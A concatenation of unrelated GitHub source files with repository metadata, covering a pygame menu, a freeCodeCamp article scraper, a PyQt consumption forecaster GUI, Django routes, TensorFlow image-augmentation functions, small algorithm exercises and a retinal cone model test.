menu\n def set_pos(self, x, y):\n self.x = x\n self.y = y\n\n # Font Style\n def set_font(self, font):\n self.font = font\n for o in self.options:\n text = o[0]\n ren = self.font.render(text, 1, (0, 0, 0))\n if ren.get_width() > self.width:\n self.width = ren.get_width()\n\n # Highlight Color\n def set_highlight_color(self, color):\n self.hcolor = color\n\n # Font Color\n def set_normal_color(self, color):\n self.color = color\n\n # Font position\n def center_at(self, x, y):\n self.x = x - (self.width / 2)\n self.y = y - (self.height / 2)\n","repo_name":"wangzhenyu1260/gobang","sub_path":"gameMenu.py","file_name":"gameMenu.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15251410996","text":"import scrapy\nimport pandas as pd\nimport requests\nfrom scrapy.crawler import CrawlerProcess\nfrom bs4 import BeautifulSoup\nfrom os.path import exists\n\nall_data = pd.DataFrame(dict())\n\nclass Spider(scrapy.Spider):\n name = \"freecodecamp\"\n\n def start_requests(self):\n file_link = exists('freecodecamp_links.csv')\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0'}\n if file_link:\n\n d = pd.read_csv('freecodecamp_links.csv')\n urls = list(d.loc[:,'links'])\n else:\n re = requests.get('https://www.freecodecamp.org/news/sitemap-posts.xml')\n s = BeautifulSoup(re.content, ['xml'])\n links = s.find_all('loc')\n\n urls = [l.text for l in links if\n l.text.startswith('https://www.freecodecamp.org/news/') and 'images' not in 
l.text]\n links = pd.DataFrame(urls, columns=['links'])\n links.to_csv('freecodecamp_links.csv')\n\n print('scrapped all links and save it in freecodecamp_links.csv')\n\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse,headers=headers)\n\n def parse(self, response):\n global all_data\n data = dict()\n # getting title\n\n data['title'] = response.css('h1.post-full-title::text').extract_first()\n\n data['date'] = response.css('time.post-full-meta-date::text').extract_first().strip()\n\n tag = response.css('section.post-full-meta a::text').extract_first()\n if tag:\n data['tag'] = tag.strip()\n\n author = response.css('span.author-card-name a::text').extract_first()\n if author:\n data['author'] = author.strip()\n\n data['author_profile_link'] = 'https://www.freecodecamp.org' + response.css('span.author-card-name a::attr(href)').extract_first()\n\n data['author_Bio'] = response.css('section.author-card-content p::text').extract_first()\n\n data['post_image_link'] = response.css('figure.post-full-image img::attr(src)').extract_first()\n\n\n data['post-content'] = str(response.css('section.post-content *::text').extract())\n\n data = pd.DataFrame(data, index=[0])\n all_data = pd.concat([all_data, data], ignore_index=True)\n\n\nif __name__ == \"__main__\":\n process = CrawlerProcess()\n\n process.crawl(Spider)\n\n process.start()\n all_data.to_csv('freecodecamp_course_data.csv')\n print(\"freecodecamp_course_data.csv is stored\")\n","repo_name":"Deepraj-chawda/E-learning-web-scrapers-","sub_path":"freecodecamp/freecodecamp.py","file_name":"freecodecamp.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43990367520","text":"import sys\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QVBoxLayout, QLabel, QLineEdit, QMessageBox, QHBoxLayout, QComboBox, QCheckBox\r\nfrom PyQt5 import QtGui\r\nfrom Calcul_conso_elec import Prediction\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom catboost import CatBoostRegressor\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport catboost\r\nimport datetime\r\n\r\nclass Fenetre(QWidget):\r\n def __init__(self):\r\n QWidget.__init__(self)\r\n self.setUI()\r\n def setUI(self):\r\n \r\n # création du champ de texte\r\n self.ChampDiam = QLineEdit('90' ) #order : Diameter, thickness, steel_type, weight, length, numbers, month\r\n self.ChampThick = QLineEdit('1.4')\r\n self.ChampSteel = QLineEdit('K60')\r\n self.ChampWeight = QLineEdit('0.06')\r\n self.ChampLen = QLineEdit('12')\r\n self.ChampNum = QLineEdit('1')\r\n self.ChampMonth = QLineEdit('1')\r\n\r\n # Création des boutons\r\n self.BoutonSubmit = QPushButton(\"Submit\")\r\n self.BoutonExit = QPushButton(\"Quit\")\r\n \r\n # on connecte pour le bouton Submit le \"clique\" à la méthode \"CalculPrediction\"\r\n # et le bouton \"Exit\" est connecte à la méthode .exit\r\n self.BoutonSubmit.clicked.connect(self.CalculPrediction)\r\n self.BoutonExit.clicked.connect(app.exit)\r\n \r\n # Création des nom des champ de saisie via des label\r\n # Création des nom des champ de saisie via des label\r\n Lmin=['86', '1.2', '0.01', '9.5', '0']\r\n Lmax=['245', '8', '0.15', '12.5', '16']\r\n self.welcome = QLabel('This program gives an idea of the consumption of the plant.\\nUse these results with a critical look.\\nThe min/max values are indicative, the predictions should be accurate in this range.\\nYou can put whatever values you want, even negative, even if it should 
not be possible.\\n')\r\n self.LabelDiam = QLabel(\"Diameter (cm), min : \" + Lmin[0] + \" | max : \" + Lmax[0])\r\n self.LabelThick = QLabel(\"Thickness (cm), min : \" + Lmin[1] + \" | max : \" + Lmax[1])\r\n self.LabelSteel = QLabel(\"Steel type\")\r\n self.combo = QComboBox(self)\r\n self.comboMonth = QComboBox(self)\r\n self.LabelWeight = QLabel(\"Weight (tons), min : \" + Lmin[2] + \" | max : \" + Lmax[2])\r\n self.LabelLen = QLabel(\"Length (m), min : \" + Lmin[3] + \" | max : \" + Lmax[3])\r\n self.LabelNum = QLabel(\"Numbers, min : \" + Lmin[4] + \" | max : \" + Lmax[4])\r\n self.LabelMonth = QLabel(\"Month\")\r\n self.cb = QCheckBox(\"Export predictions to a CSV file ? (predictions.csv is saved in the program folder)\")\r\n self.credits = QLabel(\"Program made by Clément Seguin, Michaël Soissons, Henri Prevost and Alexis Mourlon for the exclusive use of Chelpipe Group.\")\r\n\r\n Lsteel = ['17Г1С-У', 'DNV SAWL 485 FD', 'X70ME', 'K52', 'K60', 'K65']\r\n Lmonths = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'June', 'July', 'Aug', 'Sept', 'Oct', 'Nov', 'Dec']\r\n\r\n for steel in Lsteel:\r\n self.combo.addItem(steel)\r\n\r\n for month in Lmonths:\r\n self.comboMonth.addItem(month)\r\n\r\n # Mise en forme des widgets (alignement horizontal = QVBoxLayout, alignement horizontal = QHBoxLayout)\r\n layout = QVBoxLayout()\r\n hbox = QHBoxLayout()\r\n\r\n layout.addWidget(self.welcome)\r\n\r\n layout.addWidget(self.LabelDiam)\r\n layout.addWidget(self.ChampDiam)\r\n\r\n layout.addWidget(self.LabelThick)\r\n layout.addWidget(self.ChampThick)\r\n\r\n layout.addWidget(self.LabelSteel)\r\n layout.addWidget(self.combo)\r\n\r\n layout.addWidget(self.LabelWeight)\r\n layout.addWidget(self.ChampWeight)\r\n\r\n layout.addWidget(self.LabelLen)\r\n layout.addWidget(self.ChampLen)\r\n\r\n layout.addWidget(self.LabelNum)\r\n layout.addWidget(self.ChampNum)\r\n\r\n layout.addWidget(self.LabelMonth)\r\n layout.addWidget(self.comboMonth)\r\n\r\n layout.addWidget(self.cb)\r\n\r\n hbox.addWidget(self.BoutonExit)\r\n\r\n hbox.addStretch(1)\r\n\r\n hbox.addWidget(self.BoutonSubmit)\r\n\r\n layout.addWidget(self.credits)\r\n\r\n layout.addStretch(1)\r\n layout.addLayout(hbox)\r\n\r\n self.setLayout(layout)\r\n self.setWindowTitle('Chelpipe Group - Electrical Consumption Forecaster - Release 1.0 - August 2019')\r\n\r\n def MessageError(self):\r\n message = QMessageBox()\r\n message.setText(\"Invalid value entered\")\r\n message.setInformativeText(\"Please enter a value with the correct type expected\")\r\n message.setWindowTitle(\"Alert message\")\r\n message.setStandardButtons(QMessageBox.Ok)\r\n message.exec()\r\n \r\n def CalculPrediction(self):\r\n # Zone de récup des var de saisies\r\n self.ValDiam = self.ChampDiam.text()\r\n self.ValThick = self.ChampThick.text()\r\n self.ValSteel = self.combo.currentText()\r\n self.ValWeight = self.ChampWeight.text()\r\n self.ValLen = self.ChampLen.text()\r\n self.ValNum = self.ChampNum.text()\r\n self.ValMonth = self.comboMonth.currentIndex() + 1\r\n\r\n # Test de verification des var de saisies\r\n try:\r\n self.ValDiam = float(self.ValDiam)\r\n except:\r\n self.MessageError()\r\n self.ValDiam = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n try:\r\n self.ValThick = float(self.ValThick)\r\n except:\r\n self.MessageError()\r\n self.ValThick = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n try:\r\n self.ValSteel = str(self.ValSteel)\r\n except:\r\n self.MessageError()\r\n self.ValSteel = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n try:\r\n self.ValWeight = float(self.ValWeight)\r\n 
except:\r\n self.MessageError()\r\n self.ValWeight = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n try:\r\n self.ValLen = float(self.ValLen)\r\n except:\r\n self.MessageError()\r\n self.ValLen = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n try:\r\n self.ValNum = float(self.ValNum)\r\n except:\r\n self.MessageError()\r\n self.ValNum = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n try:\r\n self.ValMonth = float(self.ValMonth)\r\n except:\r\n self.MessageError()\r\n self.ValMonth = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n # Appel de la class calcul\r\n ElecConsoInput = Prediction.DD(self, self.ValDiam, self.ValThick, self.ValSteel, self.ValWeight, self.ValLen, self.ValNum, self.ValMonth)\r\n\r\n# Création de la fenetre et de l'app\r\napp = QApplication.instance()\r\nif not app:\r\n app = QApplication(sys.argv)\r\n\r\nfen = Fenetre()\r\nfen.show()\r\nfen.setGeometry(300, 300, 570, 250)\r\nfen.setWindowIcon(QtGui.QIcon(\"89001_big.ico\"))\r\napp.exec_()","repo_name":"magicien3ouf/FECCG","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33560895885","text":"'''\nGiven an unsorted array of integers nums, return the length of the longest consecutive elements sequence.\n\nYou must write an algorithm that runs in O(n) time.\n\n \n\nExample 1:\n\nInput: nums = [100,4,200,1,3,2]\nOutput: 4\nExplanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4.\nExample 2:\n\nInput: nums = [0,3,7,2,5,8,4,6,0,1]\nOutput: 9\n'''\n\nclass Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n nums.sort()\n longest, currLongest = 0, min(1,len(nums))\n for i in range(1,len(nums)):\n if(nums[i] == nums[i-1]):\n continue\n if(nums[i] == nums[i-1]+1):\n currLongest+=1\n else:\n longest, currLongest = max(longest, currLongest), 1\n return max(longest, currLongest)\n","repo_name":"sksuraj17/Leetcode-python-programs","sub_path":"Longest Consecutive Sequence.py","file_name":"Longest Consecutive Sequence.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12134039875","text":"\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom web.views import *\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nimport api.urls\nfrom api.views import *\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('apis/profession/', include([\n path('', ProfessionList.as_view()),\n path('/', DetailProfession.as_view()),\n ])),\n path('apis/orders/', include([\n path('', OrdersList.as_view()),\n path('/', DetailOrder.as_view()),\n ])),\n path('apis/profiles/', include([\n path('', ProfileList.as_view()),\n path('/', DetailProfile.as_view()),\n ])),\n path('apis/feedbacks/', include([\n path('', FeedbackList.as_view()),\n path('/', DetailFeedback.as_view()),\n ])),\n path('apis/completedorder/', include([\n path('', CompletedOrderList.as_view()),\n path('/', DetailCompletedOrder.as_view()),\n ])),\n\n path('orders/', orders, name=\"order_list\"),\n path('orders//', order_detail, name='order_detail'),\n path('orders//responses//', response_status, name='response_status'),\n path('', index, name = \"index\"),\n path('accounts/', include('django.contrib.auth.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"KarinaInTrouble/apartx.app","sub_path":"mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39878105445","text":"from .. import api_threads\nfrom .. import utils\nfrom pprint import pprint\n\nimport sublime\nimport sublime_plugin\n\n\nclass SubmitProblemCommand(sublime_plugin.TextCommand):\n def run(self, edit, finalize=False):\n code = self.view.substr(sublime.Region(0, self.view.size()))\n pprint(code)\n\n settings = utils.get_settings()\n api_key = settings.get('api_key')\n self.finalize = finalize\n self.session_thread = api_threads.SubmitKataThread(api_key, utils.get_database_file(), code,\n finalize)\n self.session_thread.start()\n sublime.set_timeout(lambda: self.handle_threads())\n\n def handle_threads(self):\n if not self.session_thread.isAlive() and self.session_thread.result is None:\n return\n\n if self.session_thread.result is None:\n sublime.set_timeout(lambda: self.handle_threads(), 1000)\n return\n\n print(\"done? 
Reustl is {}\" % self.session_thread.result)\n","repo_name":"notbaab/CodeWarsAPI","sub_path":"codewars/commands/submit_kata.py","file_name":"submit_kata.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38713007267","text":"from pymongo import MongoClient\n\ndb = MongoClient('192.168.1.180', port=32766)['pltaobao']['anchor_app_data']\n\n\ndef save_taobaoanchor_app_data(origin_data):\n resultList = origin_data.get('resultList')\n for result in resultList:\n res = db.find_one({'_id': int(result.get('userId'))})\n if not res:\n data = {\n '_id': int(result.get('userId')),\n 'name': result.get('name'),\n 'certName': result.get('certName'),\n 'city': result.get('city'),\n 'fansCount': result.get('fansCount'),\n 'headImage': result.get('headImage'),\n }\n print(data)\n db.insert_one(data)\n","repo_name":"1987128073/project","sub_path":"pinyou/taobao_2/taobaolive_spider_redis/save_taobaozhubo_app.py","file_name":"save_taobaozhubo_app.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22455790413","text":"N = int(input())\n\nn_list = sorted(list(map(int, input().split())))\n\nX = int(input())\n\ni = 0\nj = N-1\ncnt = 0\nwhile i < j:\n comp = n_list[i] + n_list[j]\n if comp == X:\n cnt+=1\n j-=1\n elif comp < X: # 값을 더해줘야 한다.\n i+=1\n elif comp > X: # 값을 빼준다.\n j-=1\n \nprint(cnt)","repo_name":"parksey/baekjoon","sub_path":"twoPoint/3273.py","file_name":"3273.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5585713693","text":"\"\"\"Implemenations of frequently use image augmentation methods\"\"\"\nfrom functools import partial\nfrom typing import Optional, Tuple, Union\n\nimport tensorflow as tf\n\n\ndef _make_pairs(batch_size: int, threshold: float) -> tf.Tensor:\n \"\"\"Generate pairs from given batch size.\n\n Args:\n batch_size (int) : Batch Size.\n threshold (float) : threshold to generate pairs with different index.\n\n Returns:\n tf.Tensor : Pairs of index for given batch size.\n \"\"\"\n image_prob_grib = tf.fill((batch_size, batch_size), 0.5, name=None)\n image_log_prob_grib = tf.math.log(tf.linalg.set_diag(image_prob_grib, tf.zeros(batch_size) + 1e-7))\n mix_indices = tf.squeeze(tf.random.categorical(image_log_prob_grib, 1, dtype=tf.int32))\n ranges = tf.range(batch_size)\n # pylint: disable=no-value-for-parameter\n mix_indices = tf.where(tf.random.uniform([batch_size]) > threshold, mix_indices, ranges)\n pairs = tf.transpose([ranges, mix_indices])\n return pairs\n\n\ndef _estimated_beta_distribution(\n concentration_0: float = 1.0, concentration_1: float = 1.0, size: Optional[int] = None\n) -> tf.Tensor:\n \"\"\"Beta distribution based on gamma.\n\n Args:\n concentration_0 (float, optional): Alpaha, positive (>0). Defaults to 1.0.\n concentration_1 (float, optional): Beta, positive (>0). 
Defaults to 1.0.\n size (int, optional): Default to None.\n\n Returns:\n tf.Tensor: Estimated beta distribution based on Alpha and Beta.\n \"\"\"\n if isinstance(size, type(None)):\n x = tf.random.gamma(shape=[], alpha=concentration_0)\n y = tf.random.gamma(shape=[], alpha=concentration_1)\n else:\n x = tf.random.gamma(shape=[size], alpha=concentration_0)\n y = tf.random.gamma(shape=[size], alpha=concentration_1)\n return x / (x + y)\n\n\ndef _get_random_box(\n combination_ratio: float, height: int, width: int\n) -> Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor]:\n \"\"\"random bounding box generator.\n\n Args:\n combination_ratio (float): target ratio of bounding box\n height (int): height of image\n width (int): width of image\n\n Returns:\n Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor]: Tuple[\n Vertical coordinate of the top-left corner, Horizontal coordinate of the top-left corner, Height, Width]\n \"\"\"\n cut_rat = tf.math.sqrt(1.0 - combination_ratio)\n cut_w = tf.cast((width * cut_rat), tf.int32)\n cut_h = tf.cast((height * cut_rat), tf.int32)\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n cut_x = tf.random.uniform([], minval=0, maxval=width, dtype=tf.int32)\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n cut_y = tf.random.uniform([], minval=0, maxval=height, dtype=tf.int32)\n\n x2 = tf.clip_by_value(cut_x + cut_w // 2, 1, width)\n y2 = tf.clip_by_value(cut_y + cut_h // 2, 1, height)\n x1 = tf.clip_by_value(cut_x - cut_w // 2, 0, x2 - 1)\n y1 = tf.clip_by_value(cut_y - cut_h // 2, 0, y2 - 1)\n\n width = x2 - x1\n height = y2 - y1\n\n return x1, y1, height, width\n\n\ndef cutmix(\n images: tf.Tensor,\n labels: tf.Tensor,\n cutmix_threshold: float = 0.5,\n image_dimension: int = 3,\n beta: float = 1.0,\n) -> Tuple[tf.Tensor, tf.Tensor]:\n \"\"\"implementation of cutmix augmentation.\n See [CutMix: Regularization Strategy to Train Strong Classifiers with Localizable Features]\n (https://arxiv.org/abs/1905.04899)\n\n Args:\n images (tf.Tensor): Batch of images to process.\n labels (tf.Tensor): Labels of images to process. This function excepted labels to be one-hot encoded.\n cutmix_threshold (float, optional): Defaults to 0.5.\n image_dimension (int, optional): Defaults to 3.\n beta (float, optional): Positive (>0), Defaults to 1.0.\n\n Raises:\n ValueError: if dimesion of images is less than image_dimension+1.\n\n Returns:\n Tuple[tf.Tensor,tf.Tensor]: Tuple[images, labels]\n \"\"\"\n\n shape = images.shape\n label_shape = labels.shape\n batch_size = tf.shape(images)[0]\n if labels.dtype != tf.float32:\n labels = tf.cast(labels, tf.float32)\n\n if beta <= 0:\n raise ValueError(\"Beta must be greater than zero.\")\n if images.shape.ndims != image_dimension + 1:\n raise ValueError(f\"Only batch of images is accepted. 
Input Images Dimesnion must be {image_dimension+1}\")\n\n def _mix(pair, height, width):\n img1 = images[pair[0]]\n label1 = labels[pair[0]]\n if pair[0] != pair[1]:\n img2 = images[pair[1]]\n label2 = labels[pair[1]]\n\n combination_ratio = _estimated_beta_distribution(beta, beta)\n x1, y1, target_height, target_width = _get_random_box(combination_ratio, height, width)\n\n crop_blank_img1 = tf.image.pad_to_bounding_box(\n tf.image.crop_to_bounding_box(img1, y1, x1, target_height, target_width), y1, x1, height, width\n )\n cropped_img1 = img1 - crop_blank_img1\n crop_blank_img2 = tf.image.pad_to_bounding_box(\n tf.image.crop_to_bounding_box(img2, y1, x1, target_height, target_width), y1, x1, height, width\n )\n mix_img = cropped_img1 + crop_blank_img2\n\n combination_ratio = 1 - (target_height * target_width) / (height * width)\n combination_ratio = tf.cast(combination_ratio, tf.float32)\n label = combination_ratio * label1 + (1 - combination_ratio) * label2\n\n return (mix_img, label)\n return (img1, label1)\n\n pairs = _make_pairs(batch_size, cutmix_threshold)\n mix = partial(_mix, height=shape[1], width=shape[2])\n return tf.map_fn(\n mix,\n pairs,\n fn_output_signature=(\n tf.TensorSpec(shape=shape[1:], dtype=images.dtype),\n tf.TensorSpec(shape=label_shape[1:], dtype=labels.dtype),\n ),\n )\n\n\ndef mixup(\n images: tf.Tensor,\n labels: tf.Tensor,\n mixup_threshold: float = 0.5,\n image_dimension: int = 3,\n beta: float = 1.0,\n) -> Tuple[tf.Tensor, tf.Tensor]:\n \"\"\"implementation of mixup augmentation.\n See [mixup: Beyond Empirical Risk Minimization] (https://arxiv.org/abs/1710.09412v2)\n\n Args:\n images (tf.Tensor): Batch of images to process.\n labels (tf.Tensor): Labels of images to process. This function excepted labels to be one-hot encoded.\n mixup_threshold (float, optional): Defaults to 0.5.\n image_dimension (int, optional): Defaults to 3.\n beta (float, optional): Positive (>0), Defaults to 1.0.\n\n Raises:\n ValueError: if dimesion of images is less than image_dimension+1.\n\n Returns:\n Tuple[tf.Tensor,tf.Tensor]: Tuple[images, labels]\n \"\"\"\n\n batch_size = tf.shape(images)[0]\n\n if images.shape.ndims != image_dimension + 1:\n raise ValueError(f\"Only batch of images is accepted. 
Input Images Dimesnion must be {image_dimension+1}\")\n\n pairs = _make_pairs(batch_size, mixup_threshold)\n\n if beta > 0:\n combination_ratio = _estimated_beta_distribution(beta, beta, size=batch_size)\n else:\n combination_ratio = tf.ones([batch_size])\n\n original_images_type = images.dtype\n if images.dtype != tf.float32:\n images = tf.image.convert_image_dtype(images, tf.float32)\n if labels.dtype != tf.float32:\n labels = tf.cast(labels, tf.float32)\n\n # pylint: disable=no-value-for-parameter\n images = tf.einsum(\"b...,b->b...\", images, combination_ratio) + tf.einsum(\n \"b...,b->b...\", tf.gather(images, pairs[:, 1]), 1 - combination_ratio\n )\n # pylint: disable=no-value-for-parameter\n labels = tf.einsum(\"b...,b->b...\", labels, combination_ratio) + tf.einsum(\n \"b...,b->b...\", tf.gather(labels, pairs[:, 1]), 1 - combination_ratio\n )\n\n if images.dtype != original_images_type:\n images = tf.image.convert_image_dtype(images, original_images_type)\n\n return images, labels\n\n\ndef random_erasing(\n image: tf.Tensor,\n label: tf.Tensor,\n random_erasing_threshold: float = 0.5,\n scale: Tuple[float, float] = (0.02, 0.4),\n ratio: Tuple[float, float] = (0.3, 3.3),\n value: Union[Tuple[float, float, float], float, str] = (0.4914, 0.4822, 0.4465),\n max_attempt: int = 50,\n) -> Tuple[tf.Tensor, tf.Tensor]:\n \"\"\"implementattion of random erasing augmentation.\n See [Random Erasing Data Augmentation] (https://arxiv.org/abs/1708.04896)\n\n Args:\n image (tf.Tensor): image to process\n label (tf.Tensor): label of the image\n random_erasing_threshold (float, optional): Defaults to 0.5.\n scale (Tuple[float, float], optional): Defaults to (0.02, 0.4).\n ratio (Tuple[float, float], optional): Defaults to (0.3, 3.3).\n value (Union[Tuple[float, float, float], float, str], optional): Defaults to (0.4914, 0.4822, 0.4465).\n max_attempt (int, optional): Defaults to 50.\n\n Raises:\n ValueError: if value is string and not in [\"random\",\"black\",\"white\"].\n\n Returns:\n Tuple[tf.Tensor,tf.Tensor]: Tuple[image, label]\n \"\"\"\n accepted_str_values = (\"random\", \"black\", \"white\")\n\n shape = image.shape\n height = shape[0]\n width = shape[1]\n\n def _erase(image, y1, x1, h, w, value):\n crop_blank = tf.image.pad_to_bounding_box(\n tf.image.crop_to_bounding_box(image, y1, x1, h, w), y1, x1, height, width\n )\n image = image - crop_blank\n value_add = tf.image.pad_to_bounding_box(value, y1, x1, height, width)\n return image + value_add\n\n if isinstance(value, str):\n if value not in accepted_str_values:\n raise ValueError(\"if value is str, it should be random or black or white\")\n\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n if tf.random.uniform([]) <= random_erasing_threshold:\n return image, label\n\n for _ in tf.range(max_attempt):\n area = height * width\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n target_area = tf.random.uniform([], minval=scale[0], maxval=scale[1]) * area\n aspect_ratio = tf.random.uniform([], minval=ratio[0], maxval=ratio[1])\n\n h = tf.cast(tf.round(tf.math.sqrt(target_area * aspect_ratio)), tf.int32)\n w = tf.cast(tf.round(tf.math.sqrt(target_area / aspect_ratio)), tf.int32)\n\n if w < width and h < height:\n x1 = tf.random.uniform([], minval=0, maxval=width - w, dtype=tf.int32)\n y1 = tf.random.uniform([], minval=0, maxval=height - h, dtype=tf.int32)\n\n if value == \"black\":\n value_add = tf.image.convert_image_dtype(tf.cast(tf.fill([h, w, shape[2]], 0), tf.uint8), image.dtype)\n image = _erase(image, 
y1, x1, h, w, value_add)\n\n if value == \"white\":\n value_add = tf.image.convert_image_dtype(\n tf.cast(tf.fill([h, w, shape[2]], 255), tf.uint8), image.dtype\n )\n image = _erase(image, y1, x1, h, w, value_add)\n\n if value == \"random\":\n value_add = tf.image.convert_image_dtype(tf.random.normal([h, w, shape[2]]), image.dtype)\n image = _erase(image, y1, x1, h, w, value_add)\n\n if isinstance(value, tuple):\n r = tf.fill([h, w], value[0])\n g = tf.fill([h, w], value[1])\n b = tf.fill([h, w], value[2])\n value_add = tf.image.convert_image_dtype(tf.stack([r, g, b], axis=-1), image.dtype)\n image = _erase(image, y1, x1, h, w, value_add)\n\n if isinstance(value, float):\n value_add = tf.image.convert_image_dtype(tf.fill([h, w, shape[2]], value), image.dtype)\n image = _erase(image, y1, x1, h, w, value_add)\n break\n return image, label\n","repo_name":"yeyinthtoon/tf2-img-aug","sub_path":"imgaug/classification/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":11782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30104337351","text":"from aiohttp import web\nfrom router_handler import RouterHandler\nimport asyncio\n\n\ndef start_server(host, port):\n _loop = asyncio.get_event_loop()\n app = web.Application(loop=_loop)\n\n handler = RouterHandler(_loop)\n\n app.router.add_post('/create_user', handler.create_user)\n app.router.add_post('/login', handler.login)\n app.router.add_route('GET', '/user', handler.get_user_info)\n app.router.add_post('/cache_user', handler.set_user_info)\n\n web.run_app(\n app,\n host=host,\n port=port\n )\n\n\ndef main():\n print()\n print(\"__Hoang Thanh Lam__\")\n print()\n\n host = 'localhost'\n port = 8096\n start_server(host, port)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"VegetaIV/login_api_v3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25774031836","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# This file is part of the project published in [1,2].\n#\n# The software is licensed under the GNU General Public License. You should have\n# received a copy of the GNU General Public License along with the source code.\n#\n#\n# BeginDocumentation\n#\n# Name: test_vanHateren\n#\n# Description: example of performance of the different stages in van Hateren's\n# model. The model reproduces results shown in Fig. 6 [3] using a simple stimulus,\n# a 100-ms step of contrast 2 at a background illuminance of 100 td.\n#\n# References:\n#\n# [1] Martinez-Cañada, P., Morillas, C., Pelayo, F. (2018). A Neuronal Network Model\n# of the Primate Visual System: Color Mechanisms in the Retina, LGN and V1. In\n# International Journal of Neural Systems. Accepted for publication.\n#\n# [2] Martinez-Cañada, P., Morillas, C., Pelayo, F. (2017). A Conductance-Based\n# Neuronal Network Model for Color Coding in the Primate Foveal Retina. In IWINAC\n# 2017\n#\n# [3] van Hateren, Hans. \"A cellular and molecular model of response kinetics\n# and adaptation in primate cones and horizontal cells.\" Journal of vision 5.4\n# (2005): 5-5.\n#\n# Author: Martinez-Cañada, P. 
(pablomc@ugr.es)\n#\n\nimport numpy as np\nimport sys,os\nimport matplotlib.pyplot as plt\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', '..','models'))\n\nimport cone_VanHateren\n\ndef main():\n\n # Model parameters (from Fig.7 and Table 1 [1])\n tauR = 0.49\n tauE = 16.8\n cb = 2.8 * 10**(-3)\n kb = 1.63 * 10**(-4)\n nX = 1.0\n tauC = 2.89\n ac = 9.08 * 10**(-2)\n nc = 4.0\n taum = 4.0\n ais = 7.09 * 10**(-2)\n gamma = 0.678\n tauis = 56.9\n gs = 8.81 # from Fig. 8 (linear horizontal-cell feedback)\n tau1 = 4.0\n tau2 = 4.0\n tauh = 20.0\n githr = 0.4\n\n # Simulation parameters\n step = 0.2 # ms (larger values make horizontal feedback unstable)\n tsim = 600.0 # ms\n\n # Pulse parameters\n pulse_duration = 100.0 # ms\n pulse_tstart = 325.0 # ms (first 300 ms are used to fill the input and\n # output buffers of linear filters)\n bkg_illuminance = 100.0 # td\n pulse_contrast = 2.0\n pulse_amplitude = pulse_contrast * bkg_illuminance # td\n\n # Constants calculated by using a dark stimulus\n # (bkg_illuminance = pulse_amplitude = 0)\n Vis_dark = 30.39 # mV\n Vh_dark = 26.05 # mV\n\n # Create cone model\n cone = cone_VanHateren.cone(step,tauR,tauE,cb,kb,nX,tauC,ac,nc,taum,ais,\n gamma,tauis,gs,tau1,tau2,tauh,githr,True)\n\n # Records of model response\n response = np.zeros((14,int(tsim/step)))\n\n # Fixed time-step simulation\n time = []\n for t in np.arange(0,int(tsim/step)):\n # input value\n if(t*step >= pulse_tstart and t*step < pulse_tstart + pulse_duration):\n input = bkg_illuminance + pulse_amplitude\n else:\n input = 